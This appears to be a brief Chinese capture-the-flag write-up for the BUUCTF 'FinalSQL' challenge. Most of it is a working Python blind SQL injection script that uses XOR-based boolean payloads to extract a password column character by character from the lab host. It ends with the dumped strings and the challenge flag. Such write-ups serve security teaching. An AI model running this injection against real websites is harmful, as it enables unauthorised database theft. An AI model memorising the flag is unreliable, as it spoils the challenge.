[极客大挑战 2019]FinalSQL
仔细查看它的提示,试一试盲注
import requests
import time
url = 'http://994f19ff-38c7-446e-b200-01d5ce55d8bc.node3.buuoj.cn/search.php'
flag = ''
for i in range(1,250):
low = 32
high = 128
mid = (low+high)//2
while(low<high):
#payload = 'http://8c7ac1a3-8ac9-4802-ba55-d0463e4683e6.node3.buuoj.cn/search.php?id=1^(ascii(substr(database(),%d,1))=%d)#' %(i,mid)
payload = url + "?id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" %(i,mid)
res = requests.get(url=payload)
if 'ERROR' in res.text:
low = mid+1
else:
high = mid
mid = (low+high)//2
if(mid ==32 or mid ==127):
break
flag = flag+chr(mid)
print(flag)
time.sleep(1)
记得一定要慢点
藏得好深
cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{ddc7e779-690e-4e20-bb90-5cc863fdc71b}
For the LichKing !